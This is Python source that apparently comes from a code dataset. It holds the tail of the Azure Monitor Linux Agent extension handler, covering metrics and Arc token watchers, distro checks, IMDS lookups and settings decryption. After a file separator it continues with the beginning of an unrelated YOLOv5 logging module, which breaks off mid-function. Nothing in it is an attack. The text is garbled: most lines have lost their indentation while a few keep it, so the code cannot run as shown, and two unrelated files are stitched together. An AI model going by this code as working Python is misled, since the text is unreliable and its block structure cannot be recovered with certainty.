hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def metrics_watcher(hutil_error, hutil_log):
"""
Watcher thread to monitor metric configuration changes and to take action on them
"""
# Check every 30 seconds
sleepTime = 30
# Retrieve managed identity info that may be needed for token retrieval
identifier_name, identifier_value, error_msg = get_managed_identity()
if error_msg:
        hutil_error('Failed to determine managed identity settings; MSI token retrieval will rely on the default identity, if any. {0}.'.format(error_msg))
# Sleep before starting the monitoring
time.sleep(sleepTime)
last_crc = None
me_msi_token_expiry_epoch = None
while True:
try:
if os.path.isfile(MdsdCounterJsonPath):
f = open(MdsdCounterJsonPath, "r")
data = f.read()
if (data != ''):
json_data = json.loads(data)
if len(json_data) == 0:
last_crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
if telhandler.is_running(is_lad=False):
# Stop the telegraf and ME services
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log(tel_msg)
else:
hutil_error(tel_msg)
# Delete the telegraf and ME services
tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service()
if tel_rm_out:
hutil_log(tel_rm_msg)
else:
hutil_error(tel_rm_msg)
if me_handler.is_running(is_lad=False):
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log(me_msg)
else:
hutil_error(me_msg)
me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False)
if me_rm_out:
hutil_log(me_rm_msg)
else:
hutil_error(me_rm_msg)
else:
crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
if(crc != last_crc):
# Resetting the me_msi_token_expiry_epoch variable if we set up ME again.
me_msi_token_expiry_epoch = None
hutil_log("Start processing metric configuration")
hutil_log(data)
telegraf_config, telegraf_namespaces = telhandler.handle_config(
json_data,
"udp://127.0.0.1:" + metrics_constants.ama_metrics_extension_udp_port,
"unix:///run/azuremonitoragent/default_influx.socket",
is_lad=False)
me_handler.setup_me(is_lad=False)
start_telegraf_res, log_messages = telhandler.start_telegraf(is_lad=False)
if start_telegraf_res:
hutil_log("Successfully started metrics-sourcer.")
else:
hutil_error(log_messages)
start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False)
if start_metrics_out:
hutil_log("Successfully started metrics-extension.")
else:
hutil_error(log_messages)
last_crc = crc
generate_token = False
                        me_token_path = os.path.join(os.getcwd(), "config", "metrics_configs", "AuthToken-MSI.json")
if me_msi_token_expiry_epoch is None or me_msi_token_expiry_epoch == "":
if os.path.isfile(me_token_path):
with open(me_token_path, "r") as f:
                                    authtoken_content = f.read()
                                    if authtoken_content:
                                        authtoken_content = json.loads(authtoken_content)
if authtoken_content and "expires_on" in authtoken_content:
me_msi_token_expiry_epoch = authtoken_content["expires_on"]
else:
generate_token = True
else:
generate_token = True
if me_msi_token_expiry_epoch:
currentTime = datetime.datetime.now()
token_expiry_time = datetime.datetime.fromtimestamp(int(me_msi_token_expiry_epoch))
if token_expiry_time - currentTime < datetime.timedelta(minutes=30):
# The MSI Token will expire within 30 minutes. We need to refresh the token
generate_token = True
if generate_token:
generate_token = False
msi_token_generated, me_msi_token_expiry_epoch, log_messages = me_handler.generate_MSI_token(identifier_name, identifier_value)
if msi_token_generated:
hutil_log("Successfully refreshed metrics-extension MSI Auth token.")
else:
hutil_error(log_messages)
telegraf_restart_retries = 0
me_restart_retries = 0
max_restart_retries = 10
# Check if telegraf is running, if not, then restart
if not telhandler.is_running(is_lad=False):
if telegraf_restart_retries < max_restart_retries:
telegraf_restart_retries += 1
hutil_log("Telegraf binary process is not running. Restarting telegraf now. Retry count - {0}".format(telegraf_restart_retries))
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log(tel_msg)
else:
hutil_error(tel_msg)
start_telegraf_res, log_messages = telhandler.start_telegraf(is_lad=False)
if start_telegraf_res:
hutil_log("Successfully started metrics-sourcer.")
else:
hutil_error(log_messages)
else:
hutil_error("Telegraf binary process is not running. Failed to restart after {0} retries. Please check telegraf.log".format(max_restart_retries))
else:
telegraf_restart_retries = 0
# Check if ME is running, if not, then restart
if not me_handler.is_running(is_lad=False):
if me_restart_retries < max_restart_retries:
me_restart_retries += 1
hutil_log("MetricsExtension binary process is not running. Restarting MetricsExtension now. Retry count - {0}".format(me_restart_retries))
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log(me_msg)
else:
hutil_error(me_msg)
start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False)
if start_metrics_out:
hutil_log("Successfully started metrics-extension.")
else:
hutil_error(log_messages)
else:
hutil_error("MetricsExtension binary process is not running. Failed to restart after {0} retries. Please check /var/log/syslog for ME logs".format(max_restart_retries))
else:
me_restart_retries = 0
except IOError as e:
hutil_error('I/O error in setting up or monitoring metrics. Exception={0}'.format(e))
except Exception as e:
hutil_error('Error in setting up or monitoring metrics. Exception={0}'.format(e))
finally:
time.sleep(sleepTime)
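# Minimal sketch (not called anywhere) of the change-detection idea used in
# metrics_watcher above: the metrics configuration is reprocessed only when the
# SHA-256 digest of the counters JSON differs from the last digest that was handled.
def _example_config_changed(data, last_crc):
    """Illustration only: return (changed, new_crc) for the given config text."""
    new_crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
    return new_crc != last_crc, new_crc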
def metrics():
"""
Take care of setting up telegraf and ME for metrics if configuration is present
"""
pids_filepath = os.path.join(os.getcwd(), 'amametrics.pid')
py_pid = os.getpid()
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
watcher_thread = Thread(target = metrics_watcher, args = [hutil_log_error, hutil_log_info])
watcher_thread.start()
watcher_thread.join()
return 0, ""
def start_arc_process():
"""
Start arc process that performs periodic monitoring activities
:return: None
"""
hutil_log_info("stopping previously running arc process")
stop_arc_watcher()
hutil_log_info("starting arc process")
#start arc watcher
ama_path = os.path.join(os.getcwd(), 'agent.py')
args = ['python{0}'.format(sys.version_info[0]), ama_path, '-arc']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def start_arc_watcher():
"""
Take care of starting arc_watcher daemon if the VM has arc running
"""
hutil_log_info("Starting the watcher")
print("Starting the watcher")
pids_filepath = os.path.join(os.getcwd(), 'amaarc.pid')
py_pid = os.getpid()
print("pid ", py_pid)
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
hutil_log_info("Written all the pids")
print("Written all the pids")
watcher_thread = Thread(target = arc_watcher, args = [hutil_log_error, hutil_log_info])
watcher_thread.start()
watcher_thread.join()
return 0, ""
# Dictionary of operations strings to methods
operations = {'Disable' : disable,
'Uninstall' : uninstall,
'Install' : install,
'Enable' : enable,
'Update' : update,
'Metrics' : metrics,
'Arc' : start_arc_watcher,
}
def stop_arc_watcher():
"""
Take care of stopping arc_watcher daemon if the VM has arc running
"""
pids_filepath = os.path.join(os.getcwd(),'amaarc.pid')
# kill existing arc watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pid in f.readlines():
# Verify the pid actually belongs to AMA arc watcher.
cmd_file = os.path.join("/proc", str(pid.strip("\n")), "cmdline")
if os.path.exists(cmd_file):
with open(cmd_file, "r") as pidf:
cmdline = pidf.readlines()
if cmdline[0].find("agent.py") >= 0 and cmdline[0].find("-arc") >= 0:
kill_cmd = "kill " + pid
run_command_and_log(kill_cmd)
# Delete the file after to avoid clutter
os.remove(pids_filepath)
def arc_watcher(hutil_error, hutil_log):
"""
    This is needed to work around mdsd's syslog permission restriction, which prevents mdsd
    from reading the temporary key files needed to make HTTPS calls to get an MSI token for Arc
    during onboarding (used to download the AMCS config).
    This method spins up a process that continuously refreshes that file path with valid keys,
    so that whenever mdsd needs to refresh its MSI token, it can find the correct keys there to make the HTTPS calls.
"""
# check every 25 seconds
sleepTime = 25
# sleep before starting the monitoring.
time.sleep(sleepTime)
while True:
try:
arc_token_mdsd_dir = "/etc/opt/microsoft/azuremonitoragent/arc_tokens/"
if not os.path.exists(arc_token_mdsd_dir):
os.makedirs(arc_token_mdsd_dir)
else:
# delete the existing keys as they might not be valid anymore
for filename in os.listdir(arc_token_mdsd_dir):
filepath = arc_token_mdsd_dir + filename
os.remove(filepath)
arc_endpoint = metrics_utils.get_arc_endpoint()
try:
msiauthurl = arc_endpoint + "/metadata/identity/oauth2/token?api-version=2019-11-01&resource=https://monitor.azure.com/"
req = urllib.request.Request(msiauthurl, headers={'Metadata':'true'})
res = urllib.request.urlopen(req)
except:
# The above request is expected to fail and add a key to the path
authkey_dir = "/var/opt/azcmagent/tokens/"
if not os.path.exists(authkey_dir):
                    raise Exception("Unable to find the auth key directory {0} that the Arc MSI auth request should have populated.".format(authkey_dir))
# Copy the tokens to mdsd accessible dir
for filename in os.listdir(authkey_dir):
filepath = authkey_dir + filename
print(filepath)
shutil.copy(filepath, arc_token_mdsd_dir)
# Change the ownership of the mdsd arc token dir to be accessible by syslog (since mdsd runs as syslog user)
os.system("chown -R syslog:syslog {0}".format(arc_token_mdsd_dir))
except Exception as e:
hutil_error('Error in arc watcher process while copying token for arc MSI auth queries. Exception={0}'.format(e))
finally:
time.sleep(sleepTime)
def parse_context(operation):
"""
Initialize a HandlerUtil object for this operation.
If the required modules have not been imported, this will return None.
"""
hutil = None
if ('Utils.WAAgentUtil' in sys.modules
and 'Utils.HandlerUtil' in sys.modules):
try:
logFileName = 'extension.log'
hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName)
hutil.do_parse_context(operation)
# parse_context may throw KeyError if necessary JSON key is not
# present in settings
except KeyError as e:
waagent_log_error('Unable to parse context with error: ' \
'{0}'.format(e))
raise ParameterMissingException
return hutil
def find_package_manager(operation):
"""
    Checks whether the distro is dpkg-based (Debian/Ubuntu) or rpm-based and assigns the package manager accordingly
"""
global PackageManager, PackageManagerOptions, BundleFileName
dist, ver = find_vm_distro(operation)
dpkg_set = set(["debian", "ubuntu"])
rpm_set = set(["oracle", "redhat", "centos", "red hat", "suse", "sles", "cbl-mariner"])
for dpkg_dist in dpkg_set:
if dist.lower().startswith(dpkg_dist):
PackageManager = "dpkg"
            # OK to replace the /etc/default/azuremonitoragent, since the placeholders get replaced again.
# Otherwise, the package manager prompts for action (Y/I/N/O/D/Z) [default=N]
PackageManagerOptions = "--force-overwrite --force-confnew"
BundleFileName = BundleFileNameDeb
break
for rpm_dist in rpm_set:
if dist.lower().startswith(rpm_dist):
PackageManager = "rpm"
# Same as above.
PackageManagerOptions = "--force"
BundleFileName = BundleFileNameRpm
break
if PackageManager == "":
log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
def find_vm_distro(operation):
"""
Finds the Linux Distribution this vm is running on.
"""
vm_dist = vm_id = vm_ver = None
parse_manually = False
try:
vm_dist, vm_ver, vm_id = platform.linux_distribution()
except AttributeError:
try:
vm_dist, vm_ver, vm_id = platform.dist()
except AttributeError:
hutil_log_info("Falling back to /etc/os-release distribution parsing")
    # Some Python versions *IF BUILT LOCALLY* (e.g. 3.5) return string responses (e.g. 'bullseye/sid')
    # from platform.dist(), which causes an exception in the parsing below; switch to manual parsing in that case.
try:
temp_vm_ver = int(vm_ver.split('.')[0])
except:
parse_manually = True
if (not vm_dist and not vm_ver) or parse_manually: # SLES 15 and others
try:
with open('/etc/os-release', 'r') as fp:
for line in fp:
if line.startswith('ID='):
vm_dist = line.split('=')[1]
vm_dist = vm_dist.split('-')[0]
vm_dist = vm_dist.replace('\"', '').replace('\n', '')
elif line.startswith('VERSION_ID='):
vm_ver = line.split('=')[1]
vm_ver = vm_ver.replace('\"', '').replace('\n', '')
except:
log_and_exit(operation, IndeterminateOperatingSystem, 'Indeterminate operating system')
return vm_dist, vm_ver
def is_vm_supported_for_extension(operation):
"""
Checks if the VM this extension is running on is supported by AzureMonitorAgent
    Return values of platform.linux_distribution() vary widely in format; for
    example, '7.3.1611' is returned for a CentOS 7 VM, so only the leading digits
    provided in the supported list must match.
    Only the distros supported by AzureMonitorLinuxAgent are allowed to use
    this VM extension; all other distros will get error code 51.
"""
supported_dists = {'redhat' : ['6', '7', '8'], # Rhel
'centos' : ['6', '7', '8'], # CentOS
'red hat' : ['6', '7', '8'], # Oracle, RHEL
'oracle' : ['6', '7', '8'], # Oracle
'debian' : ['8', '9', '10'], # Debian
'ubuntu' : ['14.04', '16.04', '18.04', '20.04'], # Ubuntu
'suse' : ['12'], 'sles' : ['15'], # SLES
'cbl-mariner' : ['1'] # Mariner
}
vm_supported = False
vm_dist, vm_ver = find_vm_distro(operation)
# Find this VM distribution in the supported list
for supported_dist in list(supported_dists.keys()):
if not vm_dist.lower().startswith(supported_dist):
continue
# Check if this VM distribution version is supported
vm_ver_split = vm_ver.split('.')
for supported_ver in supported_dists[supported_dist]:
supported_ver_split = supported_ver.split('.')
# If vm_ver is at least as precise (at least as many digits) as
# supported_ver and matches all the supported_ver digits, then
# this VM is guaranteed to be supported
vm_ver_match = True
for idx, supported_ver_num in enumerate(supported_ver_split):
try:
supported_ver_num = int(supported_ver_num)
vm_ver_num = int(vm_ver_split[idx])
except IndexError:
vm_ver_match = False
break
if vm_ver_num != supported_ver_num:
vm_ver_match = False
break
if vm_ver_match:
vm_supported = True
break
if vm_supported:
break
return vm_supported, vm_dist, vm_ver
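# Worked example of the version matching above (values are illustrative):
#   CentOS reporting '7.3.1611' against supported '7'  -> ['7'] is a prefix of
#     ['7', '3', '1611'], so the VM is treated as supported.
#   Ubuntu reporting '16.10' against supported '16.04' -> the second components
#     ('10' vs '04') differ, so that entry does not match.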
def exit_if_vm_not_supported(operation):
"""
Check if this VM distro and version are supported by the AzureMonitorLinuxAgent.
If VM is supported, find the package manager present in this distro
If this VM is not supported, log the proper error code and exit.
"""
vm_supported, vm_dist, vm_ver = is_vm_supported_for_extension(operation)
if not vm_supported:
log_and_exit(operation, UnsupportedOperatingSystem, 'Unsupported operating system: ' \
'{0} {1}'.format(vm_dist, vm_ver))
return 0
def is_arc_installed():
"""
Check if this is an Arc machine
"""
# Using systemctl to check this since Arc only supports VMs that have systemd
check_arc = os.system('systemctl status himdsd 1>/dev/null 2>&1')
return check_arc == 0
def get_arc_endpoint():
"""
Find the endpoint for Arc IMDS
"""
endpoint_filepath = '/lib/systemd/system.conf.d/azcmagent.conf'
endpoint = ''
try:
with open(endpoint_filepath, 'r') as f:
data = f.read()
endpoint = data.split("\"IMDS_ENDPOINT=")[1].split("\"\n")[0]
except:
hutil_log_error('Unable to load Arc IMDS endpoint from {0}'.format(endpoint_filepath))
return endpoint
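# For reference, get_arc_endpoint() expects azcmagent.conf to contain a quoted
# assignment of the form "IMDS_ENDPOINT=<url>" terminated by a newline (for example,
# a systemd DefaultEnvironment entry); splitting on '"IMDS_ENDPOINT=' and then on
# '"\n' extracts the URL. The exact surrounding key name is an assumption here.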
def get_imds_endpoint():
"""
Find the appropriate endpoint (Azure or Arc) for IMDS
"""
azure_imds_endpoint = 'http://169.254.169.254/metadata/instance?api-version=2018-10-01'
if (is_arc_installed()):
hutil_log_info('Arc is installed, loading Arc-specific IMDS endpoint')
imds_endpoint = get_arc_endpoint()
if imds_endpoint:
imds_endpoint += '/metadata/instance?api-version=2019-08-15'
else:
# Fall back to the traditional IMDS endpoint; the cloud domain and VM
# resource id detection logic are resilient to failed queries to IMDS
imds_endpoint = azure_imds_endpoint
hutil_log_info('Falling back to default Azure IMDS endpoint')
else:
imds_endpoint = azure_imds_endpoint
hutil_log_info('Using IMDS endpoint "{0}"'.format(imds_endpoint))
return imds_endpoint
def get_azure_environment_and_region():
"""
    Retrieve the Azure environment and region from Azure or Arc IMDS
"""
imds_endpoint = get_imds_endpoint()
req = urllib.request.Request(imds_endpoint)
req.add_header('Metadata', 'True')
environment = region = None
try:
response = json.loads(urllib.request.urlopen(req).read())
if ('compute' in response):
if ('azEnvironment' in response['compute']):
environment = response['compute']['azEnvironment']
if ('location' in response['compute']):
region = response['compute']['location'].lower()
except urllib.error.HTTPError as e:
hutil_log_error('Request to Metadata service URL failed with an HTTPError: {0}'.format(e))
hutil_log_error('Response from Metadata service: {0}'.format(e.read()))
except:
hutil_log_error('Unexpected error from Metadata service')
return environment, region
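# Abridged sketch of the IMDS instance metadata fields consumed above (all other
# fields omitted; values are examples only):
#   {"compute": {"azEnvironment": "AzurePublicCloud", "location": "westus2"}}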
def run_command_and_log(cmd, check_error = True, log_cmd = True):
"""
Run the provided shell command and log its output, including stdout and
stderr.
The output should not contain any PII, but the command might. In this case,
log_cmd should be set to False.
"""
exit_code, output = run_get_output(cmd, check_error, log_cmd)
if log_cmd:
hutil_log_info('Output of command "{0}": \n{1}'.format(cmd.rstrip(), output))
else:
hutil_log_info('Output: \n{0}'.format(output))
# also write output to STDERR since WA agent uploads that to Azlinux Kusto DB
    # take only the last 500 characters, as the extension output is cut off after that
try:
if exit_code != 0:
sys.stderr.write(output[-500:])
if "Permission denied" in output:
# Enable failures
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
except:
hutil_log_info('Failed to write output to STDERR')
return exit_code, output
def run_command_with_retries_output(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
    If the retry_check returns True for retry_verbosely, we will try cmd with
    the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code, output
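# Typical usage sketch for the retry helper above (this mirrors the uninstall path
# earlier in this file):
#   exit_code, output = run_command_with_retries_output(
#       'dpkg -P azuremonitoragent', retries = 4,
#       retry_check = retry_if_dpkg_locked,
#       final_check = final_check_if_dpkg_locked)
# retry_check must return a (should_retry, retry_message, retry_verbosely) tuple.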
def is_dpkg_locked(exit_code, output):
"""
If dpkg is locked, the output will contain a message similar to 'dpkg
status database is locked by another process'
"""
if exit_code != 0:
dpkg_locked_search = r'^.*dpkg.+lock.*$'
dpkg_locked_re = re.compile(dpkg_locked_search, re.M)
if dpkg_locked_re.search(output):
return True
return False
def retry_if_dpkg_locked(exit_code, output):
"""
Some commands fail because the package manager is locked (apt-get/dpkg
only); this will allow retries on failing commands.
"""
retry_verbosely = False
dpkg_locked = is_dpkg_locked(exit_code, output)
apt_get_exit_code, apt_get_output = run_get_output('which apt-get',
chk_err = False,
log_cmd = False)
if dpkg_locked:
return True, 'Retrying command because package manager is locked.', \
retry_verbosely
else:
return False, '', False
def final_check_if_dpkg_locked(exit_code, output):
"""
If dpkg is still locked after the retries, we want to return a specific
error code
"""
dpkg_locked = is_dpkg_locked(exit_code, output)
if dpkg_locked:
exit_code = DPKGLockedErrorCode
return exit_code
def get_settings():
"""
Retrieve the configuration for this extension operation
"""
global SettingsDict
public_settings = None
protected_settings = None
if HUtilObject is not None:
public_settings = HUtilObject.get_public_settings()
protected_settings = HUtilObject.get_protected_settings()
elif SettingsDict is not None:
public_settings = SettingsDict['public_settings']
protected_settings = SettingsDict['protected_settings']
else:
SettingsDict = {}
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
seq_no = get_latest_seq_no()
settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no))
try:
with open(settings_path, 'r') as settings_file:
settings_txt = settings_file.read()
settings = json.loads(settings_txt)
h_settings = settings['runtimeSettings'][0]['handlerSettings']
public_settings = h_settings['publicSettings']
SettingsDict['public_settings'] = public_settings
except:
hutil_log_error('Unable to load handler settings from ' \
'{0}'.format(settings_path))
if ('protectedSettings' in h_settings
and 'protectedSettingsCertThumbprint' in h_settings
and h_settings['protectedSettings'] is not None
and h_settings['protectedSettingsCertThumbprint'] is not None):
encoded_settings = h_settings['protectedSettings']
settings_thumbprint = h_settings['protectedSettingsCertThumbprint']
encoded_cert_path = os.path.join('/var/lib/waagent',
'{0}.crt'.format(
settings_thumbprint))
encoded_key_path = os.path.join('/var/lib/waagent',
'{0}.prv'.format(
settings_thumbprint))
decoded_settings = base64.standard_b64decode(encoded_settings)
decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \
'-inkey {1}'.format(encoded_cert_path,
encoded_key_path)
try:
session = subprocess.Popen([decrypt_cmd], shell = True,
stdin = subprocess.PIPE,
stderr = subprocess.STDOUT,
stdout = subprocess.PIPE)
output = session.communicate(decoded_settings)
except OSError:
pass
protected_settings_str = output[0]
if protected_settings_str is None:
log_and_exit('Enable', 1, 'Failed decrypting ' \
'protectedSettings')
protected_settings = ''
try:
protected_settings = json.loads(protected_settings_str)
except:
hutil_log_error('JSON exception decoding protected settings')
SettingsDict['protected_settings'] = protected_settings
return public_settings, protected_settings
def update_status_file(operation, exit_code, exit_status, message):
"""
    Mimic the HandlerUtil method do_status_report in case the hutil method is not
    available.
    Write the status to the status file.
"""
handler_env = get_handler_env()
try:
extension_version = str(handler_env['version'])
status_dir = str(handler_env['handlerEnvironment']['statusFolder'])
except:
extension_version = "1.0"
status_dir = os.path.join(os.getcwd(), 'status')
status_txt = [{
"version" : extension_version,
"timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
"status" : {
"name" : "Microsoft.Azure.Monitor.AzureMonitorLinuxAgent",
"operation" : operation,
"status" : exit_status,
"code" : exit_code,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_json = json.dumps(status_txt)
# Find the most recently changed config file and then use the
# corresponding status file
latest_seq_no = get_latest_seq_no()
status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no))
status_tmp = '{0}.tmp'.format(status_path)
with open(status_tmp, 'w+') as tmp_file:
tmp_file.write(status_json)
os.rename(status_tmp, status_path)
def get_handler_env():
"""
Set and retrieve the contents of HandlerEnvironment.json as JSON
"""
global HandlerEnvironment
if HandlerEnvironment is None:
handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
try:
with open(handler_env_path, 'r') as handler_env_file:
handler_env_txt = handler_env_file.read()
handler_env = json.loads(handler_env_txt)
if type(handler_env) == list:
handler_env = handler_env[0]
HandlerEnvironment = handler_env
except Exception as e:
waagent_log_error(str(e))
return HandlerEnvironment
def get_latest_seq_no():
"""
Determine the latest operation settings number to use
"""
global SettingsSequenceNumber
if SettingsSequenceNumber is None:
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
latest_seq_no = -1
cur_seq_no = -1
latest_time = None
try:
for dir_name, sub_dirs, file_names in os.walk(config_dir):
for file_name in file_names:
file_basename = os.path.basename(file_name)
match = re.match(r'[0-9]{1,10}\.settings', file_basename)
if match is None:
continue
cur_seq_no = int(file_basename.split('.')[0])
file_path = os.path.join(config_dir, file_name)
cur_time = os.path.getmtime(file_path)
if latest_time is None or cur_time > latest_time:
latest_time = cur_time
latest_seq_no = cur_seq_no
except:
pass
if latest_seq_no < 0:
latest_seq_no = 0
SettingsSequenceNumber = latest_seq_no
return SettingsSequenceNumber
def run_get_output(cmd, chk_err = False, log_cmd = True):
"""
    Mimic the waagent method RunGetOutput in case waagent is not available
Run shell command and return exit code and output
"""
if 'Utils.WAAgentUtil' in sys.modules:
# WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput
# If checking the number of parameters fails, pass 2
try:
sig = inspect.signature(waagent.RunGetOutput)
params = sig.parameters
waagent_params = len(params)
except:
try:
spec = inspect.getargspec(waagent.RunGetOutput)
params = spec.args
waagent_params = len(params)
except:
waagent_params = 2
if waagent_params >= 3:
exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd)
else:
exit_code, output = waagent.RunGetOutput(cmd, chk_err)
else:
try:
output = subprocess.check_output(cmd, stderr = subprocess.STDOUT,
shell = True)
exit_code = 0
except subprocess.CalledProcessError as e:
exit_code = e.returncode
output = e.output
            # On Python 3, e.output is already a bytes object, so only encode str output
            if isinstance(output, str):
                output = output.encode('utf-8')
# On python 3, encode returns a byte object, so we must decode back to a string
if sys.version_info >= (3,):
output = output.decode('utf-8', 'ignore')
return exit_code, output.strip()
def init_waagent_logger():
"""
Initialize waagent logger
If waagent has not been imported, catch the exception
"""
try:
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True)
except Exception as e:
print('Unable to initialize waagent log because of exception ' \
'{0}'.format(e))
def waagent_log_info(message):
"""
Log informational message, being cautious of possibility that waagent may
not be imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Log(message)
else:
print('Info: {0}'.format(message))
def waagent_log_error(message):
"""
Log error message, being cautious of possibility that waagent may not be
imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Error(message)
else:
print('Error: {0}'.format(message))
def hutil_log_info(message):
"""
Log informational message, being cautious of possibility that hutil may
not be imported and configured
"""
if HUtilObject is not None:
HUtilObject.log(message)
else:
print('Info: {0}'.format(message))
def hutil_log_error(message):
"""
Log error message, being cautious of possibility that hutil may not be
imported and configured
"""
if HUtilObject is not None:
HUtilObject.error(message)
else:
print('Error: {0}'.format(message))
def log_and_exit(operation, exit_code = 1, message = ''):
"""
Log the exit message and perform the exit
"""
if exit_code == 0:
waagent_log_info(message)
hutil_log_info(message)
exit_status = 'success'
else:
waagent_log_error(message)
hutil_log_error(message)
exit_status = 'failed'
if HUtilObject is not None:
HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
message)
else:
update_status_file(operation, str(exit_code), exit_status, message)
sys.exit(exit_code)
# Exceptions
# If these exceptions are expected to be caught by the main method, they
# include an error_code field with an integer with which to exit from main
class AzureMonitorAgentForLinuxException(Exception):
"""
Base exception class for all exceptions; as such, its error code is the
basic error code traditionally returned in Linux: 1
"""
error_code = 1
def get_error_message(self, operation):
"""
Return a descriptive error message based on this type of exception
"""
return '{0} failed with exit code {1}'.format(operation,
self.error_code)
class ParameterMissingException(AzureMonitorAgentForLinuxException):
"""
There is a missing parameter for the AzureMonitorLinuxAgent Extension
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to a missing parameter: {1}'.format(operation,
self)
if __name__ == '__main__' :
main()
|
__init__.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import warnings
from threading import Thread
import torch
from torch.utils.tensorboard import SummaryWriter
from utils.general import colorstr, emojis
from utils.loggers.wandb.wandb_utils import WandbLogger
from utils.plots import plot_images, plot_results
from utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
try:
import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
except (ImportError, AssertionError):
wandb = None
class Loggers():
# YOLOv5 Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
if wandb and 'wandb' in self.include:
wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
